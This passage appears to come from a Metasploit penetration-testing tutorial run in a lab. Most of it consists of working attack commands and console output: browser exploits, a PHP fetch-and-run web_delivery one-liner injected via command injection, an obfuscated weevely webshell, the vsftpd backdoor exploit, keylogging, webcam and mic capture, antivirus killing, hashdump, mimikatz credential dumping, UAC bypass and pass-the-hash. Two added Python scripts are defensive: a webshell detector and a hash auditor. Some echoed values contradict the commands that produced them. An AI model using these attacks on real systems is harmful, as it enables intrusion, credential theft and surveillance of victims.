 16     Great      adobe_flash_opaque_background_uaf     windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_net_connection_confusion  windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_nellymoser_bof            windows/meterpreter/reverse_tcp on 4444
 19     Great      adobe_flash_hacking_team_uaf          windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownloa  windows/meterpreter/reverse_tcp on 4444
 21     Good       ms14_064_ole_code_execution           windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.0.150:8080/IqV4IRZ7Q85f
[*] Server started.

Enter http://192.168.0.150:8080/IqV4IRZ7Q85f in the browser under test

[*] Gathering target information for 192.168.0.169
[*] Sending HTML response to 192.168.0.169
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Requested: /PIJKiQZx/hqDDuX/
[*] 192.168.0.169    wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.0.169    ms14_064_ole_code_execution - Sending VBS stager
[*] Sending stage (175686 bytes) to 192.168.0.169
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.169:1525) at 2022-07-20 17:36:45 +0800
Exploiting a web vulnerability

Windows 10, 7, 2003, 2000

http://192.168.0.160:8100/sec/17/example.php?cmd= is a PHP command injection vulnerability

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899  
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  
[*] Server started.  
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
Enter in the browser: http://192.168.0.160:8100/sec/17/example.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.0.160:8080/SPzNh9%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22
[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
  Id  Name  Type                    Information       Connection
  --  ----  ----                    -----------       ----------
  1         meterpreter php/linux   www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45 +0800  example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data
Remote control through a web system
#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.

testweb.php

<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg++,$ih';
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g++){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(.+)$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>
# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[+] weevely 4.0.1
[+] Target: 192.168.0.150:8100
[+] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> help
 :file_rm                      Remove remote file.
 :file_clearlog                Remove string from a file.
 :file_edit                    Edit remote file on a local editor.
 :file_bzip2                   Compress or expand bzip2 files.
 :file_upload                  Upload file to remote filesystem.
 :file_download                Download file from remote filesystem.
 :file_ls                      List directory content.
 :file_webdownload             Download an URL.
 :file_cp                      Copy single file.
 :file_find                    Find files with given names and attributes.
 :file_enum                    Check existence and permissions of a list of paths.
 :file_tar                     Compress or expand tar archives.
 :file_touch                   Change file timestamp.
 :file_zip                     Compress or expand zip files.
 :file_mount                   Mount remote filesystem using HTTPfs.
 :file_gzip                    Compress or expand gzip files.
 :file_cd                      Change current working directory.
 :file_upload2web              Upload file automatically to a web folder and get corresponding URL.
 :file_read                    Read remote file from the remote filesystem.
 :file_grep                    Print lines matching a pattern in multiple files.
 :file_check                   Get attributes and permissions of a file.
 :shell_sh                     Execute shell commands.
 :shell_php                    Execute PHP commands.
 :shell_su                     Execute commands with su.
 :sql_dump                     Multi dbms mysqldump replacement.
 :sql_console                  Execute SQL query or run console.
 :system_extensions            Collect PHP and webserver extension list.
 :system_info                  Collect system information.
 :system_procs                 List running processes.
 :audit_filesystem             Audit the file system for weak permissions.
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd              Read /etc/passwd with different techniques.
 :audit_suidsgid               Find files with SUID or SGID flags.
 :audit_phpconf                Audit PHP configuration.
 :bruteforce_sql               Bruteforce SQL database.
 :backdoor_tcp                 Spawn a shell on a TCP port.
 :backdoor_reversetcp          Execute a reverse TCP shell.
 :net_scan                     TCP Port scan.
 :net_proxy                    Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig                 Get network interfaces addresses.
 :net_curl                     Perform a curl-like HTTP request.
 :net_mail                     Send mail.
 :net_phpproxy                 Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ system_info
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
| document_root    | C:/xampp/htdocs                                                                         |
| whoami                 |                                                                                           |
| hostname              | DESKTOP-9A8VFKB                                                                         |
| pwd                    | C:\xampp\htdocs\sec\19                                                                |
| open_basedir           |                                                                                           |
| safe_mode              | False                                                                                     |
| script                 | /sec/19/testweb.php                                                                     |
| script_folder          | C:\xampp\htdocs\sec\19                                                                |
| uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os                     | Windows NT                                                                              |
| client_ip              | 192.168.0.150                                                                           |
| max_execution_time   | 30                                                                                        |
| php_self               | /sec/19/testweb.php                                                                     |
| dir_sep                | \                                                                                         |
| php_version            | 5.6.28                                                                                  |
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+

DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
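The testweb.php above only looks harmless because weevely splits the real PHP into fragments padded with a junk token and rebuilds create_function from a mangled string. As an added example (not from the original post or from weevely), the following Python script replays those str_replace() strippings on a file's own string literals and reports the dangerous calls that only appear afterwards; the two sample files inside it are constructed.

```python
"""Heuristic detector for weevely-style obfuscated PHP webshells.

Added example; not part of the original post or of weevely itself.
The generated shell hides its logic by splitting the real PHP into
single-quoted string fragments padded with a junk token ('hg'),
concatenating them, stripping the token with str_replace('hg', '', ...)
and invoking the result through create_function, whose own name is rebuilt
with str_replace('R', '', 'crReaRRte_fuRncRtRion'). A plain grep for eval
or create_function therefore sees nothing. This script replays every
str_replace('<token>', '', ...) found in a file on the file's own string
literals and reports the dangerous functions that surface afterwards.
"""
import os
import re

# Functions whose appearance only after deobfuscation marks a likely webshell.
DANGEROUS = ("create_function", "eval", "assert", "gzuncompress",
             "base64_decode", "system", "shell_exec", "passthru", "exec")

# str_replace('<token>', '', ...)  -> the token being stripped out
STRIP_CALL_RE = re.compile(r"str_replace\(\s*'([^']+)'\s*,\s*''\s*,")
# single-quoted PHP string literals (weevely emits its fragments this way)
STRING_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")


def find_dangerous(text):
    """Return the sorted list of DANGEROUS names present in text."""
    return sorted(name for name in DANGEROUS if name in text)


def deobfuscate(source):
    """Concatenate the file's string literals and apply each empty-replacement
    str_replace() to them. Returns (deobfuscated_text, tokens_found)."""
    tokens = STRIP_CALL_RE.findall(source)
    joined = "".join(STRING_RE.findall(source))
    for token in tokens:
        joined = joined.replace(token, "")
    return joined, tokens


def analyse(source):
    """Classify one PHP source text."""
    visible = find_dangerous(source)          # what a naive grep already sees
    deob, tokens = deobfuscate(source)
    hidden = [n for n in find_dangerous(deob) if n not in visible]
    return {
        "tokens": tokens,
        "visible": visible,
        "hidden": hidden,
        # Dangerous calls that exist only after stripping tokens are the
        # signature of this obfuscation; visible ones merely deserve review.
        "suspicious": bool(hidden),
    }


def scan_tree(root):
    """Walk a webroot and return analyse() reports for suspicious PHP files."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    report = analyse(fh.read())
            except OSError:
                continue
            if report["suspicious"]:
                hits[path] = report
    return hits


# Constructed sample in the style of the weevely output (not the real
# generated shell): the same 'hg' padding and rebuilt create_function name.
SAMPLE_SHELL = r"""<?php
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="x";@evahgl(@gzuncomhgpresshg(@bashge64_decodhge($m[1])));';
$J=str_replace('hg','',$L);
$h=$R('',$J);$h();
?>"""

# Constructed benign file for comparison.
SAMPLE_BENIGN = "<?php echo htmlspecialchars($_GET['name'] ?? 'world'); ?>"

if __name__ == "__main__":
    for label, src in (("sample shell", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN)):
        print(label, analyse(src))
```

Run scan_tree("/var/www/html") (or the XAMPP htdocs folder) to get a report per flagged file; the heuristic is deliberately narrow, so treat a hit as a file to inspect by hand rather than a verdict.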

Resource files

The most basic resource file

#echo version > resource.rc
#echo "load sounds" >> resource.rc
# msfconsole -r resource.rc
…
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >

Resource file for attacking Windows 7

windows7.rc

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.0.155
run

# msfconsole -r windows7.rc
…

Resource file for attacking Windows 10

Windows 10.rc

use exploit/multi/handler
set lhost 192.168.0.150
set lport 8888
set payload windows/meterpreter/reverse_tcp
run

# msfconsole -r windows10.rc
…

Resource file for attacking Android

android.rc

set lhost 192.168.0.150
set lport 9999
set payload android/meterpreter/reverse_tcp

# msfconsole -r android.rc
…

Penetrating Linux

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800

Meterpreter guide (post-exploitation techniques)

Basic commands

Common meterpreter commands

Command              Purpose
background           Return to the console, leaving the Meterpreter session in the background
sessions             List the currently established sessions
sessions -i number   Interact with session n
sessions -i          Show the current sessions
sessions -k number   Close session n
bgkill               Kill a Meterpreter script
bglist               List all running background scripts
bgrun                Run a script as a background thread
channel              Show active channels
close                Close a channel
exit                 Terminate the Meterpreter session
quit                 Terminate the Meterpreter session
interact id          Switch into a channel
run                  Run an existing module; after typing run, press Tab twice to list all available scripts. Commonly used ones are autoroute, hashdump, arp_scanner and multi_meter_inject
irb                  Enter Ruby scripting mode
read                 Read data from a channel
write                Write data to a channel
use                  Load a meterpreter extension
load/use             Load a module
resource             Run an existing rc script

Android-specific commands

Command                              Purpose
dump_contacts                        Dump the phone's contacts
dump_sms                             Dump the SMS messages
send_sms -d 15330252525 -t "hello"   Make the lab phone send an SMS
geolocate                            Get the lab phone's GPS location
wlan_geolocate                       Get the lab phone's Wi-Fi based location
record_mic -d 5                      Record audio on the lab phone
webcam_list                          List the lab phone's camera devices
webcam_snap                          Take a photo with the lab phone
webcam_stream                        Stream the lab phone's camera live

Some Windows-specific commands

Command     Purpose
ps          List processes
getpid      Show the current process ID
sysinfo     Show system information
route       Show the full network configuration
getsystem   Automatic privilege escalation
getuid      Show the current privileges
pwd         Show which directory on the target you are in

Other commands

Check whether the target is a virtual machine: run post/windows/gather/checkvm

Disable antivirus software: run post/windows/manage/killav

Enable Remote Desktop Protocol: run post/windows/manage/enable_rdp

Enumerate the currently logged-on users: run post/windows/gather/enum_logged_on_users

List the installed applications: run post/windows/gather/enum_applications

Grab a screenshot of the target: load espia ; screengrab

List camera devices: webcam_list

Take a photo: webcam_snap

Stream the webcam live: webcam_stream

Record audio: record_mic

Show the current directory: getlwd

Dump the password hashes of the current users: run hashdump

username:SID:LM hash:NTLM hash:::

The following command can also be used and dumps with higher privileges: run windows/gather/smart_hashdump

Grab the auto-logon username and password: run windows/gather/credentials/windows_autologin

Get plaintext passwords directly (note: this requires SYSTEM privileges; run getsystem to obtain them)
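As an added example (not from the original post), the following Python script parses dumps in the username:SID:LM hash:NTLM hash::: format shown above, as hashdump prints them in the Windows 7 and Windows 10 runs later on, and audits them for empty passwords, stored LM hashes and reused NT hashes. The field the page labels SID is the account's RID; the sample dump inside the script is constructed, and only its two well-known hash values are real.

```python
"""Audit a Windows hashdump for weak credential material.

Added example; not part of the original post. The dump format is
  username:RID:LM hash:NT hash:::   (one account per line)
Two values in it are well known:
  aad3b435b51404eeaad3b435b51404ee  = no LM hash is stored (modern default)
  31d6cfe0d16ae931b73c59d7e0c089c0  = NT hash of the empty password
LM hashes each 7-byte half of the password separately, so a stored LM hash
whose second half is aad3b435b51404ee belongs to a password of at most
7 characters. The audit flags empty-password accounts, accounts that still
store an LM hash, and groups of accounts sharing one NT hash.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM_HALF = EMPTY_LM[16:]   # LM hash of an all-padding 7-byte half

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_dump(text):
    """Parse hashdump output. Framework chatter such as '[*] ...' lines is
    skipped, so a whole console transcript can be pasted in."""
    records = []
    for raw in text.splitlines():
        match = LINE_RE.match(raw.strip())
        if not match:
            continue
        rec = match.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        records.append(rec)
    return records


def audit(records):
    """Return the weak-credential findings for a list of parsed records."""
    findings = {"empty_password": [], "lm_present": [], "reused": {}}
    by_nt = defaultdict(list)
    for rec in records:
        # Disabled built-ins (Guest, DefaultAccount, ...) also carry the empty
        # NT hash, so cross-check account status before treating this as live.
        if rec["nt"] == EMPTY_NT:
            findings["empty_password"].append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            short_password = rec["lm"][16:] == EMPTY_LM_HALF
            findings["lm_present"].append((rec["user"], short_password))
        by_nt[rec["nt"]].append(rec["user"])
    findings["reused"] = {
        nt: users for nt, users in by_nt.items()
        if len(users) > 1 and nt != EMPTY_NT
    }
    return findings


# Constructed sample in the page's format; every hash other than the two
# well-known constants is a placeholder, not a real hash.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1003:1c3a2b4d5e6f7a8baad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```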

Shell

Enter the Windows terminal shell

Filesystem commands

File interaction commands

ID  Command    Description
1   cat        Read a file's contents
2   cd         Change directory on the target
3   cp         Copy a file to a destination
4   mv         Move a file to a destination
5   chmod      Change file permissions (for example chmod 777 shell.elf)
6   del / rm   Delete a file on the target
7   dir        Print the target's directory listing
8   mkdir      Create a directory on the target
9   rmdir      Delete a directory on the target
10  edit       Edit a file
11  getlwd     Print the local directory
12  getwd      Print the target directory
13  lcd        Change the local directory
14  lls        List the local directory
15  ls         List the target's files and directories
16  lpwd       Print the local directory
17  pwd        Print the working directory
19  search     Search for files; see search -h for details

Linux permissions

chmod 777 {filename.extension}

chmod 777 shell.elf

upload

Upload a file to the target, e.g. upload setup.exe C:\windows\system32

download nimeia.txt /root/Desktop/

# Download a file to the local machine, e.g. download C:\boot.ini /root/ or download C:\"ProgramFiles"\Tencent\QQ\Users\295******125\Msg2.0.db /root/

search

Search for files, e.g.

search -d c:\ -f *.doc

search -d c:\Users\xiang\Desktop -f *.txt

enumdesktops

Number of logged-on users

ipconfig

Show the IP addresses

Other commands

Screenshot

meterpreter > screenshot

Screenshot saved to: /home/jerry/BqXLvJAp.jpeg

Get system information

meterpreter > sysinfo
Computer        : WIN-2VEIIKHJ7M8
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Capturing keystrokes

meterpreter > ps
Process List
============
 PID   PPID  Name          Arch  Session  User                    Path
…
 1184  1132  explorer.exe  x64   1        WIN-2VEIIKHJ7M8\小铃铛  C:\Windows\Explorer.EXE
meterpreter > migrate 1184    (migrate into process 1184)
[*] Migrating from 2496 to 1184... 
[*] Migration completed successfully.  
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WIN-2VEIIKHJ7M8
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt 
[*] Recording keystrokes... 
^C[*] User interrupt.  
[*] Shutting down keylog recorder. Please wait...
# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8\小铃铛 started at 2022-06-24 13:22:19 +0800
tgest
<^H><^H><^H><^H><^H><^H>test
I a
mFy<^H><^H>Gu
Xiang
www.
3
Keylog Recorder exited at 2022-06-24 13:24:03 +0800

Privilege escalation

The most basic privilege escalation

meterpreter > getuid
Server username: E86004903967404\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Privilege escalation through a vulnerability

Windows 7

meterpreter > background
msf6 exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1
SESSION => 1
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168
rhost => 192.168.0.168
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Bypassing UAC for privilege escalation

Windows 7

User Account Control (UAC) is a control mechanism Microsoft introduced in Windows Vista and later versions of Windows. It works by asking the user whether to authorize an application's access to the hard drive and system files, which helps stop malicious programs (malware) from damaging the system.

meterpreter > background
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
…
[*] Meterpreter session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19 15:45:06 +0800
meterpreter > getuid
Server username: WIN-2VEIIKHJ7M8\小铃铛
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Triggering the UAC mechanism

Windows 10

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ask) > set session 1
session => 1
msf6 exploit(windows/local/ask) > set filename payload.exe
filename => payload.exe
msf6 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading payload.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27 11:39:52 +0800
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Obtaining usernames and passwords

Extracting password hashes

Windows 10
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::
xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: 
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name       Arch  Session  User                 Path
 ---  ----  ----       ----  -------  ----                 ----
 736  644   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
meterpreter > migrate 736
[*] Migrating from 5724 to 736...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...'
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success. 
meterpreter > kiwi_cmd sekurlsa::logonpasswords
…
SID   : S-1-5-21-2772671008-4265266102-715737954-1001
       msv :      
        [00000003] Primary
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * NTLM : 4f151ab2d4afdef65f9664b0422ad83f
       tspkg :      
       wdigest :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       kerberos :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       ssp :      
       credman :      
       cloudap :      
…

Re-entering

msf6 exploit(windows/local/ask) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 443
msf6 exploit(multi/handler) set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14 +0800
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14 +0800
meterpreter >

Windows 7

meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 512  396   lsass.exe  x64   0NT AUTHORITY\SYSTEM  C:\Windows\system32\lsass.exe
meterpreter > migrate 512
[*] Migrating from 1672 to 512...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name :   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       ssp :      
       credman :      
  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
